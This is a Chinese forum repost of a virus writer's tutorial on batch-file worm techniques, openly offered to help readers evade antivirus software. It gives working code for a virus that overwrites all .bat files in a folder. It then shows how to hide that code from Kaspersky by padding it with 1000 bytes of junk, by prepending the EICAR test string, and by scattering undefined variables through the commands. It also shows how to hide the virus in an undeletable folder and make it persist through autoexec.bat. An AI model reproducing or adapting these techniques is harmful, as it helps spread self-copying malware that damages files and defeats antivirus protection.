设为首页 | 收藏本页
登陆您的帐号 | 免费注册帐号
全部栏目 > 计算机 > 软件 > 人工智能
下一篇上一篇 首页图文展示(无图)

一些有用的批处理技巧

发布人:hy58
发布日期:2015-06-06 09:21:46
刷新日期:2015-06-06 09:21:46
回复或评论:0
阅览:325
当我在写一个bat蠕虫的时候我发现了一个对bat病毒来说非常有用的技术,比如用在加密或多态性.我也   
    发现了一些其他技术,而且这些技术是反ava技术的.好了,让我们开始吧...   
    索引   
    我敢保证,以下我所说的技术都是你们想知道的,下面是内容的简略部分 :)    
    1.加入欺骗代码   
    2.让文件夹无法删除   
    3.加入EICAR测试文件   
    4.代码中的垃圾伪代码   
    加入欺骗代码   
    这是一个反kav杀毒的技术.或许你知道,kav只检查bat文件的前1000 Byte,那么大家想想,这对我们来说   
    意味着什么呢?:)我们可以在bat病毒文件前加入1000 Byte的垃圾代码.下面是一段只在当前文件夹内覆   
    盖bat文件的病毒代码,kav称之为'BAT.Silly.d'.   
    BAT.Silly.d   
    for %%a in (*.bat) do copy %0 %%a   
    现在让我们来测试一下新技术.在一个bat文件中包含1000 Btye的垃圾代码不会影响到bat文件的正常运   
    行,因为bat文件忽略简单的输入错误,下面的代码中就包含了随机的小写字母.同样也可以包括大写字母   
    等其他的一些字符,但是必须要注意的是不能包含'<'或'>'这样的字符,因为这样的话,计算机会认为你要   
    输入或输出字符,到计算机终端设备.   
    Fake Bytes   
    stjrdnfuqlgmpuwefguowyakzxgkxolraxozihswcfngwkpaolmmyfrzmsxbcnvrmwrtnjpwybshmhxjtimvzwjuoakncjwynilyp zciptpriqzrfqkqwgfiqpivuityndlqmlivmdtkjuynjdxzmpjedfjacsqgybiwcamxxxwolzzkprquufavkqfdyuqjcxvpizrakx pdmogwizgfrjhvxrmeewywmknxbqbthypeksxmywlfaijracwftfsflicvgfwqzsnrductwbvvtkkzerzgpcbzkngktcdfybzsnby emlcctvneufmhnvfsutoqnldznssinuqigrxbzyxwfmblnqhxztsokqyldnimzgjsmqwshasowgjrmwldkikgjwuffflhwugwrbqd qhbueiaahtvwmhfrhntudpvscpkiftyiwceboltowopsojwxbuarilavnacqlljixreykldgdqxdckayqztleotrbijiwzpesheyd cweyfyrldgvwkcocrqfqtlxuchxdhkpddokhpvxcihqshgqnpjoeqlxspcncyzlvkywzbtijvuiazhevcorognwzgscmmcappqrzw vmtjkatslrkzxrrwxiawspgfvwwphueigwostqtuwrsabmlsrugeudglkmadpimsdbhsmhzlqtcaqftezwbaqrlkzjnzdhvhrpgbi ajbakariwolazvdwhskrdsyqqcjayyqwusubevwumtwysahdzxtqhausneeistduraaaozircfrxqaidvarbiwibwzbtjajurezzd wvqswebffznuymcvqhitlgknfdlwbzdlxfikprozaaxynlxhtmcflbnptelhpgpymekdijonvhyiswpgprdhxtffzimxrdofzonaz qficniylakfqrazsqqviidufwfuwcialsryemswoekufgliuyybgzdydtqfmqnfqwdxmztbzqultebjbahjcadmibazhxsqljsslv cqqqtsqfndkcwihitiscoqqsphuooymtkolmjdielrslulfpqodcitauueorvbyohxhmwgfwozxkggipmgpkoutzykratrhamqbxj   
    for %%a in (*.bat) do copy %0 %%a   
    上面的代码看起来是那么的愚蠢:).但是运行的时候kav是不会显示任何警告和提示的.我想你一定非常喜   
    欢这项技术.   
    让文件夹无法删除   
    这项技术看起来比较酷.其实他的原理是利用了windows系统的一个小bug.假如我们在MS-DOS下创建一个   
    包含特殊字符的文件夹,那么在windows下将无法确认这个新建的文件夹,随之而来的便是你无法删除,移   
    动或者打开他.下面我们列出所有的这些特殊字符的ASCII码.   
    Letter List   
    ASCII 176: °    
    ASCII 177: ±    
    ASCII 178: &sup2;    
    ASCII 179: &sup3;    
    ASCII 180: ′    
    ASCII 185: &sup1;    
    ASCII 186: o    
    ASCII 187: ?    
    ASCII 188: &frac14;    
    ASCII 191: ?    
    ASCII 192: à    
    ASCII 193: á    
    ASCII 194: ?    
    ASCII 195: ?    
    ASCII 196: ?    
    ASCII 197: ?    
    ASCII 200: è    
    ASCII 201: é    
    ASCII 202: ê    
    ASCII 203: ?    
    ASCII 204: ì    
    ASCII 205: í    
    ASCII 206: ?    
    ASCII 213: ?    
    ASCII 217: ù    
    ASCII 218: ú    
    ASCII 219: ?    
    ASCII 220: ü    
    ASCII 223: ?    
    ASCII 242: ò    
    ok,上面就是那些特殊字符的ASCII码了,现在我们在%windir%中制作一个样本文件夹让他无法删除.在windows98的系统中,我们还可以在autoexec.bat中添加语句,让bat文件可以随机启动.   
    Letter List example   
    cls   
    @echo off   
    cd %windir%   
    md o′üòì   
    cd o′üòì   
    copy %0 virus.bat   
    echo cd %windir% >>autoexec.bat   
    echo cd o′üòì >>autoexec.bat   
    echo virus.bat >>autoexec.bat    
    我敢肯定你一定能看懂上面的代码,在这里要感谢'Trojan.BAT.NoDelDir'的作者.但是我却不知道他的真名叫什么,如果你在这里看到的话,请联系我本人.   
    加入EICAR测试文件   
    我想每个人都应该知道EICAR病毒测试文件是什么东西,如果不知道也没关系,我将给你解释一下,他是来自EICAR的一个com文件(有兴趣的朋友可以到http://www.eicar.org/anti_virus_test_file.htm去看看),他是用来测试反病毒软件的杀毒能力的一个测试文件.那我们应该怎么利用它呢?事实上几乎每个人都知道这个文件,反病毒软件的提示并不会引起人们的注意,利用这点,我们将EICAR测试文件的代码加到我们的病毒程序中,这样的话就不会引起用户的警觉.下面是EICAR测试文件的内容:   
    EICAR-content   
    [email=X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*[code]X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*[code[/email]]   
    这项技术原理等同于欺骗代码技术.但是他包含了非常有用的内容:EICAR-content.这样的话欺骗代码中包含的同样是被反病毒程序所识别的'病毒'文件,反病毒软件提示的就不是'BAT.Silly.d'而是'EICAR-Test-File',同样是起到了欺骗的作用.   
    EICAR-content example   
    [code]X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*   
    for %%a in (*.bat) do copy %0 %%a    
    代码中的垃圾伪代码   
    题目看起来有点郁闷,什么叫'垃圾伪代码'呢?就是写在有效代码中间,但是运行的时候无任何作用的代码.听完上述的讲解你首先会想到什么命令来实现这一功能呢?'set'命令?那么你已经在理解我的意思了,ok,没定义过的变量是空的(=nothing),那么在运行的时候变量也是没有任何用处的.这样我们就解决了我们的问题了:),下面来看看被kav提示为'BAT.Silly.d'的傻瓜式病毒代码.   
    %anyting%fo%anyting%r %%a i%anyting%n (%anyting%*.ba%anyting%t) d%anyting%o co%anyting%py %0 %%a    
    正如你所看到的,上面的代码非常容易实现.但是却相当有用.注意:你必须保证你所用的变量没有被定义过,否则病毒是不能运行的.如果你不确定变量是否为空的,那你最好在文件开头加上一句'set anthing='将变量清空.   
    最后   
    开开反病毒软件的玩笑,这项技术真的很有用或加密一些东西或者其他的某些应用.那么反病毒程序真的有大麻烦了.现在我的唯一希望是你们能在你们的工作中真正的用上这项技术(或者其中的一些:D),因为我花了很多时间在发现这项技术,寻找错误和更好的应用它上面.而且检查了其他的系统是否也能够应用这项技术,然后又花了很长时间写了出来,OK, in the end I want to say sorry about my english spelling or grammer mistakes :).   
评论(0) 暂无回帖


打印 收藏 关闭窗口 下一篇上一篇